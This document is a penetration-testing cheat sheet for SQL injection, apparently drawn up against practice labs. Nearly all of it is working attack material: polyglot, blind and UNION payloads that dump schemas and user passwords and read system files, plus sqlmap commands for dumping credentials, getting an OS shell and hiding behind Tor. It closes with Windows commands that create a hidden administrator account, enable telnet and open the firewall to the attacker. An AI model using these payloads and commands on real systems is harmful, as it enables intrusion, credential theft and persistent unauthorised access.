Core Idea: Does the page look like it might need to call on stored data?
There exist some SQLi polyglots, i.e (Mathias Karlsson);
SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/
Works in single quote context, works in double quote context, works in “straight into query” context!
You can also leverage the large database of fuzzlists from Seclists (
##SQL Injection Observations Blind is predominant, Error based is highly unlikely.
SQLMap is king!
- Use -l to parse a Burp log file.
- Use Tamper Scripts for blacklists.
- SQLiPy Burp plugin works well to instrument SQLmap quickly.
Lots of injection in web services!
- Try injecting characters reserved in databases to produce error messages
- If error message is produces, examine message for helpful errors, queries, database brand, columns, tables or other information.
- If no error message present, send valid data, "true" injections ("or 1=1") and "false" injections ("and 1=0"). Look for difference in the three responses
Technique: Blind SQL Injection - True and False Values
Field: username
True Value (Using Proxy): ' or 1=1 --
False Value (Using Proxy): ' and 1=0 --
- If no errors nor differences are produced, try timing attacks ("mysql sleep(), sql server waitfor(), oracle sleep()")
' union Select null, null, null, sleep(5) --
- UNION statements
- Determine number of columns in application query. Inject NULL columns until injected query works.
- Determine position of a varchar or equivalent column
- Use position of found column(s) to place injected columns. Use NULL for rest
- Inline injection
- Usually happens when ORDER BY or HAVING clause present in application query
- Timing injection
Technique: Blind SQL Injection - Timing
Page: login.php
Field: username
Value (Using Proxy): ' union Select null, case SUBSTRING(current_user(),1,1) when 'r' THEN sleep(5) ELSE sleep(0) END, null, null --
Value (Using Direct Request): username=%27%20union%20Select%20null%2C%20case%20SUBSTRING%28current_user%28%29%2C1%2C1%29%20when%20%27r%27%20THEN%20sleep%285%29%20ELSE%20sleep%280%29%20END%2C%20null%2C%20null%20--%20&password=&login-php-submit-button=1
Technique: Direct Injection
Page: user-info.php
Field: username
Value (Using Proxy): ' union select null,VERSION() AS username,null,null --
Technique: Direct Injection
Page: user-info.php
Field: username
Value (Using Proxy): ' union select null,DATABASE() AS username,null,null --
Technique: Direct Injection
Page: user-info.php
Field: username
Value (Using Proxy): ' union select null,table_schema AS username,null,null from INFORMATION_SCHEMA.TABLES--
Technique: Direct Injection
Page: user-info.php
Field: username
Value (Using Proxy): ' union select null,table_schema AS username,table_name AS password,null from INFORMATION_SCHEMA.TABLES--
Technique: Direct Injection
Recon: Extract table columns from database using a single field
Page: user-info.php
Field: Username
Value: ' union select null,concat_ws('.', table_schema, table_name, column_name) AS username,null,null from INFORMATION_SCHEMA.COLUMNS--
Technique: Direct Injection
Page: user-info.php
Field: Username
Value: ' union select null, owasp10.accounts.username AS username, owasp10.accounts.password AS password, null from owasp10.accounts --
Technique: Direct Injection
Page: user-info.php
Field: username
Value (relative path):
' union select null, LOAD_FILE('../README') AS username, null, null--
Value (absolute path):
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\system32\\drivers\\etc\\hosts') AS username, null, null--
' union select null, LOAD_FILE('..\\..\\..\\..\\WINDOWS\\inf\\cpu.inf') AS username, null, null--
12. Attempt to execute commands. This is easier on SQL Server 2000 and 2005. MySQL has limited system command abilities. SQL Server 2008 disables system commands by default and requires them to be enabled.
MySQL Functions:
VERSION() - MySQL server version
USER() - Database user issuing query
DATABASE() - Database on server against which query is running
14. Attempt to pivot to database server level. This will largely depend on either being able to execute system commands via the database server or upload files to the file system. Uploading files would allow web application pages to be uploaded which can contain system calls.
# + is the encode of space
# 3 is our guess for used columns
>' order by 3 --+
# We usually get the output for one query only,
# So we should get rid of the first query by searching for
# a non exist value like -1
>' union all select 1,2,3 --+
>' union all select 1,database(),version() --+
# database name = security
>' union all select 1,table_name,3 from information_schema.tables where table_schema='security' --+
# database name = security
>' union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
>' union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
>' union all select 1,group_concat(username),group_concat(password) from users --+
It is the same as with quote injection but using \ instead of ' for error detection and not using any thing in injection itself
> sqlmap -u URl -data DataToSentInPost -p PARAMETER(id) --level 3 risk 3 -random-agent --tor --check-tor --delay=500 --randomize=delay
time sqlmap -r /path/to/request/file.txt --fingerprint
You copy the request with header and body from ZAP/burp and save it to a file then
time sqlmap -r /path/to/request/file.txt --fingerprint
time sqlmap -r /path/to/request/file.txt --banner
time sqlmap -r /path/to/request/file.txt --current-user --current-db --hostname --is-dba
time sqlmap -r /path/to/request/file.txt --users --passwords
time sqlmap -r /path/to/request/file.txt --dbs
time sqlmap -r /path/to/request/file.txt -D <db_name> --tables
time sqlmap -r /path/to/request/file.txt -D <db_name> -T <table1, table2> --columns
time sqlmap -r /path/to/request/file.txt -D <db_name> -T <table_name> -C <column1,column2,column3> --dump
Sometimes sqlmap can not find a unique column to figure out how many rows are there, so the work-around is to sort a column value so sqlmap figure out how many row are there
time sqlmap -r /path/to/request/file.txt -D <db_name> -T <table_name> --sql-query="SELECT column4,column7 FROM <db_name>.<table_name> ORDER BY <column4> DESC"
time sqlmap -r /path/to/request/file.txt --sql-query="SELECT column4,column7 FROM <db_name>.<table_name> ORDER BY <column4> DESC"
time sqlmap -r /path/to/request/file.txt -D <Db_name> --sql-query="SELECT column_name from information_schema.columns where table_name = 'user'"
time sqlmap -r /path/to/request/file.txt --prefix="SELSCT * FROM <table_name> WHERE column_name='" --suffix=" -- " --banner
time sqlmap -r /path/to/request/file.txt --os-shell
To see transactions ' tcpdump -i eth1 -vvv -X'
How O/S Shell works
- Sqlmap put on the server two files:
- 1st stage uploader
- 2nd stage Command Shell Page
- Sqlmap put on the server two files:
In case of the server is Windows, you can get access through the firewall like that
> sc query state= all
> sc query tlnsvr
> sc config tlnserver start= demand
> sc start tlnsvr
> net user root toor /add
> net localgroup TelnetClients /add
> net localgroup Administrators root /add
> net localgroup TelnetClients root /add
> netsh firewall add portopening protocol=TCP port=23 name=telnet mode=enable scope=custom adresses=<your.public.ip.address>
- You also can access the command prompt through the webpage like that
##Best SQL injection resources
- MySQL:
- [PentestMonkey's mySQL injection cheat sheet] (
- [Reiners mySQL injection Filter Evasion Cheatsheet] (
- [EvilSQL's Error/Union/Blind MSSQL Cheatsheet] (
- [PentestMonkey's MSSQL SQLi injection Cheat Sheet] (
- [PentestMonkey's Oracle SQLi Cheatsheet] (
- [PentestMonkey's Postgres SQLi Cheatsheet] (
- Others
- [Access SQLi Cheatsheet] (
- [PentestMonkey's Ingres SQL Injection Cheat Sheet] (
- [Pentestmonkey's DB2 SQL Injection Cheat Sheet] (
- [Pentestmonkey's Informix SQL Injection Cheat Sheet] (
- [SQLite3 Injection Cheat sheet] (
- [Ruby on Rails (Active Record) SQL Injection Guide] (